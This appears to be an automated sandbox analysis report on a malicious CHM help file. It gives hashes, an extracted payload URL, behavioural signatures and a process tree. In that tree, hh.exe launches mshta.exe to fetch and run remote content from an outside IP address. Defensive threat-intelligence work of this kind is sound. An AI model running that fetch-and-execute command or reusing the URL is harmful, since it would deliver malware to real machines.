Analysis
max time kernel: 79s
max time network: 126s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/04/2023, 02:08
Static task: static1
Behavioral task: behavioral1
  Sample: 40d6b60a30a8ea1f2911efcef19487e0.chm
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: 40d6b60a30a8ea1f2911efcef19487e0.chm
  Resource: win10v2004-20230220-en
General
Target: 40d6b60a30a8ea1f2911efcef19487e0.chm
Size: 100KB
MD5: 40d6b60a30a8ea1f2911efcef19487e0
SHA1: 78e65b1f2860db8a12630173faa98f2bc184a898
SHA256: ead97a3920ff557299bcd4ccde1770c759263b93b70414258ec9030bbd0cb750
SHA512: 83f6d8f4836088d673f3da4e758af69cf9ebe4b1135a39070f0171ea39b57553c616821bc1d2233711ff7525a9ddefd85a5315da2ca11113ff6aa3f69780fbcf
SSDEEP: 1536:4bGN5bBPms1O9bKgJPV/EUNN5AkqqZDa6UZrVutluxh1oj6y3uf+/XOtJAMS:tTEsE9GOpfN5ApqZmHrkOh1zyf/X71
Malware Config
Extracted: http://141.105.65.165/data/8.html
Signatures

Blocklisted process makes network request (1 IoC)
flow | pid | Process
11 | 3416 | mshta.exe
Modifies Internet Explorer settings
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\International\CpMRU | hh.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" | hh.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Size = "10" | hh.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" | hh.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" | hh.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
pid | Process
1612 | hh.exe
1612 | hh.exe

Suspicious use of WriteProcessMemory (2 IoCs)
description | pid | Process | procid_target
PID 1612 wrote to memory of 3416 | 1612 | hh.exe | 85
PID 1612 wrote to memory of 3416 | 1612 | hh.exe | 85
Processes

C:\Windows\hh.exe
  Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\40d6b60a30a8ea1f2911efcef19487e0.chm
  PID: 1612
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/8.html ,
    PID: 3416
    - Blocklisted process makes network request